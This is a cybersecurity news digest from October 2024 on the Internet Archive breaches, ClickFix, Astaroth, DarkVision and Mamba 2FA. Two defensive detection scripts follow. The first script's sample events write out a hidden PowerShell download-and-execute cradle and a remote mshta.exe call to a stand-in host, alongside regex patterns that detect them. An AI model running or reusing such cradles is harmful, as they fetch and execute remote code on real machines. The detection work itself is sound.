MSP cybersecurity news digest, October 22, 2024

Internet Archive attacked, 31 million users’ data from its “Wayback Machine” exposed

The Internet Archive faced its first major breach around September 28, 2024, when 31 million user records from its popular "Wayback Machine" were exposed. The breach was revealed through a JavaScript alert on the site, disclosing email addresses, bcrypt-hashed passwords and other internal data. Security expert Troy Hunt, creator of "Have I Been Pwned," confirmed the breach, and affected users will soon be able to check if their data was compromised. The Internet Archive immediately began efforts to secure its systems and strengthen security.

Shortly after the first breach, a second vulnerability was uncovered in the Internet Archive’s Zendesk email support platform. Unrotated GitLab authentication tokens enabled a threat actor to gain access to over 800,000 support tickets containing personal data dating back to 2018. This included requests for site removals and general support inquiries. Despite previous warnings about the exposed tokens, the Internet Archive had not rotated them, leading to another serious data breach.

As the story unfolded, it became clear that these breaches were not financially motivated. The threat actor behind the Zendesk breach had also accessed the Internet Archive's source code and other sensitive information.

ClickFix campaign lures users to fake Google Meet pages to deliver info-stealing malware

A new ClickFix campaign uses Google Meet phishing emails to lure users to fake Google Meet pages. Once on the fake page, a message showing a false connectivity error appears, along with a “Try Fix” call to action (CTA). If a user clicks the CTA, PowerShell delivers info-stealing malware on Windows and macOS, such as DarkGate, Matanbuchus, NetSupport, Amadey Loader, XMRig, a clipboard hijacker, and Lumma Stealer.

ClickFix, a social engineering tactic first reported in May 2024, was used by threat actor TA571, who displayed fake error messages for Chrome, Microsoft Word and OneDrive. The campaign tricks users into copying PowerShell code to the clipboard and running it in the Windows Command Prompt, which infects their system. Victims ultimately download malware like DarkGate, Lumma Stealer or, on macOS, AMOS Stealer.

Recent attacks target industries like transport and logistics, using phishing emails, fake Facebook pages and deceptive GitHub issues. These campaigns are linked to two threat groups, Slavic Nation Empire and Scamquerteo, both subteams of cryptocurrency scam gangs. Researchers also identified a number of other platforms being impersonated in similar attacks to distribute malware, including Zoom, web3 browsers and video games.

Threat actor Water Makara deploys Astaroth banking trojan to target Latin American companies

Researchers have discovered that a threat actor group dubbed Water Makara deploys the Astaroth banking trojan in a new spear-phishing campaign targeting companies in Latin America, and especially in Brazil. The campaign primarily impacts manufacturing, retail, and government sectors by disguising malicious emails as urgent tax documents to deceive users into downloading the malware.

The malicious emails prompt recipients to download a zip file that contains a malicious Windows shortcut which abuses mshta.exe, a legitimate Windows binary. This method establishes a connection to a command-and-control server, enabling further malicious actions.

Astaroth, although an old trojan, remains a persistent threat with the potential to cause long-term damage to consumer trust and business operations. To reduce risk, companies should implement strong password policies, multifactor authentication (MFA) and regular software updates.
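Both the ClickFix chain above (a user pastes PowerShell into a console, which then fetches and runs remote code) and the Water Makara chain (a shortcut launches mshta.exe against remote content) leave a recognizable process-creation trail. The script below is an added example of how a defender might flag both patterns in endpoint telemetry; it is not code from the digest or from any of the vendors it cites. The events are constructed to resemble Sysmon process-creation records (parent image, image, command line), the hostnames and the `example.invalid` URL are made up, and the regex indicator lists are a starting point rather than a complete rule set.

```python
import re

# Constructed sample events, shaped loosely like Sysmon Event ID 1. Hosts and URLs are invented.
SAMPLE_EVENTS = [
    {   # ClickFix-style: pasted "fix" runs in cmd.exe, which spawns PowerShell with a download cradle
        "host": "ws-17",
        "parent_image": r"C:\Windows\System32\cmd.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": 'powershell -w hidden -c "iex (New-Object Net.WebClient)'
                        '.DownloadString(\'http://example.invalid/fix\')"',
    },
    {   # Shortcut-in-zip style: Explorer launches mshta.exe pointed at remote content
        "host": "ws-22",
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\mshta.exe",
        "command_line": "mshta.exe http://example.invalid/doc.hta",
    },
    {   # Benign: an administrator runs a local script from an interactive console
        "host": "ws-03",
        "parent_image": r"C:\Windows\System32\cmd.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": r"powershell -File C:\scripts\inventory.ps1",
    },
    {   # Benign: an installer runs a local HTA from its own install directory
        "host": "ws-08",
        "parent_image": r"C:\Windows\System32\msiexec.exe",
        "image": r"C:\Windows\System32\mshta.exe",
        "command_line": r'mshta.exe "C:\Program Files\Vendor\setup.hta"',
    },
]

# Indicators of a "download something, then execute it" cradle in a PowerShell command line.
DOWNLOAD_CRADLE = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|net\.webclient)",
    re.IGNORECASE,
)
# Indicators that the output is executed in memory or that the window is hidden from the user.
EXEC_FLAGS = re.compile(
    r"(\biex\b|invoke-expression|-e(nc|ncodedcommand)?\b|-w(indowstyle)?\s+hidden)",
    re.IGNORECASE,
)
# A URL or UNC path: mshta.exe loading content that did not come from the local disk.
REMOTE_REF = re.compile(r"(https?://|\\\\[^\\\s]+\\)", re.IGNORECASE)

# Parents from which a user-typed or double-clicked command would arrive.
USER_SHELLS = {"cmd.exe", "explorer.exe"}


def basename(path: str) -> str:
    """Return the lowercase file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify_event(event: dict) -> list:
    """Return the list of detection names that match one process-creation event."""
    image = basename(event["image"])
    parent = basename(event["parent_image"])
    cmd = event["command_line"]
    findings = []

    # ClickFix: PowerShell started from a user shell with a cradle AND an execute/hide flag.
    if image in ("powershell.exe", "pwsh.exe") and parent in USER_SHELLS:
        if DOWNLOAD_CRADLE.search(cmd) and EXEC_FLAGS.search(cmd):
            findings.append("clickfix_pasted_powershell")

    # mshta.exe pulling remote content, regardless of which process launched it.
    if image == "mshta.exe" and REMOTE_REF.search(cmd):
        findings.append("mshta_remote_content")

    return findings


def scan(events: list) -> list:
    """Run classify_event over a batch and return (host, image, findings) for every hit."""
    hits = []
    for ev in events:
        findings = classify_event(ev)
        if findings:
            hits.append((ev["host"], basename(ev["image"]), findings))
    return hits


if __name__ == "__main__":
    for host, image, findings in scan(SAMPLE_EVENTS):
        print(f"{host}: {image} -> {', '.join(findings)}")
```

The two benign events show why the rules pair indicators: a local script run from cmd.exe and a local HTA run by an installer both touch the same binaries but never match, because neither fetches remote content. Tuning in a real environment usually means adding the organization's own script paths and software-distribution parents to an allow list rather than loosening the regexes.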

PureCrypter loader delivers DarkVision RAT in new malware campaign

Researchers have uncovered a new malware campaign using the PureCrypter loader to deliver the DarkVision RAT.

Researchers have observed this activity since July 2024. DarkVision RAT uses custom network protocols for communication and supports commands like keylogging, remote access and password theft. PureCrypter, available since 2022, is sold on a subscription basis to distribute various malware. The infection chain involves decrypting and launching PureCrypter, which eventually loads DarkVision and sets up persistence mechanisms.

DarkVision RAT, first seen in 2020, costs as little as $60 and offers many malicious features. It is favored by attackers due to its affordability and extensive capabilities.

Phishing-as-a-service platform Mamba 2FA targets Microsoft 365 accounts

Mamba 2FA is a phishing-as-a-service (PhaaS) platform targeting Microsoft 365 accounts through adversary-in-the-middle (AiTM) attacks. It captures authentication tokens and bypasses MFA protections using well-crafted login pages.

Sold for $250 per month, Mamba 2FA has been active since November 2023 and has evolved to include proxy servers and short-lived link domains to avoid detection. It targets corporate and consumer accounts with phishing templates for services like OneDrive and SharePoint, dynamically mimicking company login pages. Captured credentials and cookies are sent to attackers via a Telegram bot for immediate access.

Mamba 2FA also uses sandbox detection to evade analysis.
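In an AiTM attack like the one Mamba 2FA performs, the identity provider sees the phishing proxy as the victim's client, and the captured session cookie is then used from wherever the attacker sits. One detection signal a defender can extract from sign-in logs is therefore a session that was established interactively from one network and then used, shortly afterwards, from a different network. The script below is an added example of that correlation and is not code from the digest or from any vendor it cites. The sign-in records are constructed, the field names (`session_id`, `asn`, `country`, `event`) are assumptions about what an identity provider's log exposes, and the IP addresses come from the documentation ranges.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sign-in records (not a real tenant's logs). Field names are assumed.
SAMPLE_SIGNINS = [
    # alice authenticates through the phishing proxy (proxy IP seen as the client),
    # then her session cookie is replayed four minutes later from another network.
    {"ts": "2024-10-15T09:00:00Z", "user": "alice@example.com", "session_id": "s-1001",
     "ip": "203.0.113.10", "asn": "AS64500", "country": "NL", "event": "interactive_signin"},
    {"ts": "2024-10-15T09:04:00Z", "user": "alice@example.com", "session_id": "s-1001",
     "ip": "198.51.100.7", "asn": "AS64501", "country": "US", "event": "token_use"},
    # bob signs in and keeps using the session from the same place.
    {"ts": "2024-10-15T09:10:00Z", "user": "bob@example.com", "session_id": "s-1002",
     "ip": "192.0.2.5", "asn": "AS64502", "country": "US", "event": "interactive_signin"},
    {"ts": "2024-10-15T09:30:00Z", "user": "bob@example.com", "session_id": "s-1002",
     "ip": "192.0.2.5", "asn": "AS64502", "country": "US", "event": "token_use"},
    # carol's address changes within the same provider and country (e.g. DHCP churn): not flagged.
    {"ts": "2024-10-15T09:12:00Z", "user": "carol@example.com", "session_id": "s-1003",
     "ip": "192.0.2.20", "asn": "AS64502", "country": "US", "event": "interactive_signin"},
    {"ts": "2024-10-15T09:40:00Z", "user": "carol@example.com", "session_id": "s-1003",
     "ip": "192.0.2.21", "asn": "AS64502", "country": "US", "event": "token_use"},
]


def parse_ts(value: str) -> datetime:
    """Parse the ISO-8601 UTC timestamps used in the sample records."""
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def find_replayed_sessions(records: list, window: timedelta = timedelta(hours=1)) -> list:
    """Return one alert per session whose token is used, within `window` of the
    interactive sign-in, from a different ASN or country than the sign-in itself."""
    by_session = defaultdict(list)
    for rec in records:
        by_session[rec["session_id"]].append(rec)

    alerts = []
    for session_id, events in by_session.items():
        events.sort(key=lambda r: parse_ts(r["ts"]))
        origin = next((e for e in events if e["event"] == "interactive_signin"), None)
        if origin is None:
            continue  # no interactive sign-in to compare against
        t0 = parse_ts(origin["ts"])
        for use in events:
            if use["event"] != "token_use":
                continue
            if parse_ts(use["ts"]) - t0 > window:
                continue  # outside the correlation window; a separate rule would cover long-lived reuse
            if use["asn"] != origin["asn"] or use["country"] != origin["country"]:
                alerts.append({
                    "session_id": session_id,
                    "user": use["user"],
                    "signin_ip": origin["ip"],
                    "replay_ip": use["ip"],
                    "minutes_after_signin": int((parse_ts(use["ts"]) - t0).total_seconds() // 60),
                })
                break  # one alert per session is enough to trigger a session revocation
    return alerts


if __name__ == "__main__":
    for alert in find_replayed_sessions(SAMPLE_SIGNINS):
        print(alert)
```

The natural response to such an alert is revoking the session and the refresh tokens behind it, then re-examining the interactive sign-in's source for the proxy infrastructure mentioned above. Detection after the fact is the fallback, though: because an AiTM proxy relays the real login, code- and push-based MFA are satisfied at the genuine identity provider, whereas origin-bound, phishing-resistant methods such as FIDO2 security keys refuse to complete on the proxy's domain and so prevent the capture in the first place.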